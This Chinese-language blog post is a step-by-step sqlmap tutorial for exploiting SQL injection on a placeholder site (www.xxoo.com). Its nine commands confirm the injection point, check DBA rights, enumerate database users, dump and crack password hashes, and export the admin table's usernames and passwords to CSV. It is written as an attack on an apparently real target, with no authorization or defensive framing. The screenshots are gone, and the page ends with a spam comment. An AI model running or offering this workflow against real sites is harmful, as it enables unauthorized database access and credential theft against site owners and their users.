• 欢迎访问金笔头博客,这是一个持续学习者的自留地,欢迎访问我的github:点击进入

Sql Injection and Dump The Data

信息安全 eason 2186次浏览 1个评论 扫描二维码

1.检测注入点是否可用

root@kali:~/Desktop# sqlmap -u http://www.xxoo.com/assist/index.php?id=20

参数:

-u:指定注入点url

Sql Injection and Dump The Data

探测结果可知:
(1)注入参数id为GET注入,注入类型为UNION query
(2)web应用程序技术为PHP5.6.9
(3)数据库类型为MySQL
2.查看当前用户
root@kali:~/Desktop# sqlmap -u http://www.xxoo.com/assist/index.php?id=20 --current-user
Sql Injection and Dump The Data
3.判断当前库用户是否是DBA
root@kali:~/Desktop# sqlmap -u http://www.xxoo.com/assist/index.php?id=20 --is-dba
Sql Injection and Dump The Data
运气不错,还真是DBA!
4.列举数据库用户
root@kali:~/Desktop# sqlmap -u http://www.xxoo.com/assist/index.php?id=20 --users
Sql Injection and Dump The Data
由返回结果可知该数据库有7个用户
5.获取数据库用户密码
root@kali:~/Desktop# sqlmap -u http://www.xxoo.com/assist/index.php?id=20 --passwords
Sql Injection and Dump The Data
看以看到各用户对应的HASH密码已经显示出来了,sqlmap自带解密模块,选择Y可以自动载入解密字典
Sql Injection and Dump The Data
Sql Injection and Dump The Data
自带字典不给力,不过也解出两个密码来了
6.查看当前数据库
root@kali:~/Desktop# sqlmap -u http://www.xxoo.com/assist/index.php?id=20 --current-db
Sql Injection and Dump The Data
7.列出当前数据库中的表
root@kali:~/Desktop# sqlmap -u http://www.xxoo.com/assist/index.php?id=20 -D 'cw' --tables
参数:
-D:数据库名
–tables:列出表名
Sql Injection and Dump The Data
8.列出表中的字段
root@kali:~/Desktop# sqlmap -u http://www.xxoo.com/assist/index.php?id=20 -D 'cw' -T 'admin' --columns
参数:
-D:指定数据库名
-T:指定要列出字段的表名
–columns:列出字段
Sql Injection and Dump The Data
9.暴力猜解字段内容
root@kali:~/Desktop# sqlmap -u http://www.xxoo.com/assist/index.php?id=20 -D 'cw' -T 'admin' -C "user,pwd" --dump
参数:
-D:指定数据库名
-T:指定要列出字段的表名
-C:要猜解的字段
–dump:导出结果
Sql Injection and Dump The Data
Sql Injection and Dump The Data
Sql Injection and Dump The Data
导出数据已经已经保存到/usr/share/sqlmap/output/www.xxoo.com/dump/cw/admin.csv中,打开admin.csv内容如下:
Sql Injection and Dump The Data

 

 


金笔头博客, 版权所有丨如未注明 , 均为原创, 转载请注明Sql Injection and Dump The Data
喜欢 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(1)个小伙伴在吐槽
  1. Hey, thanks for the blog post.Thanks Again. Fantastic.
    massage fuck2016-02-03 12:52 Reply Windows XP | Opera 9.64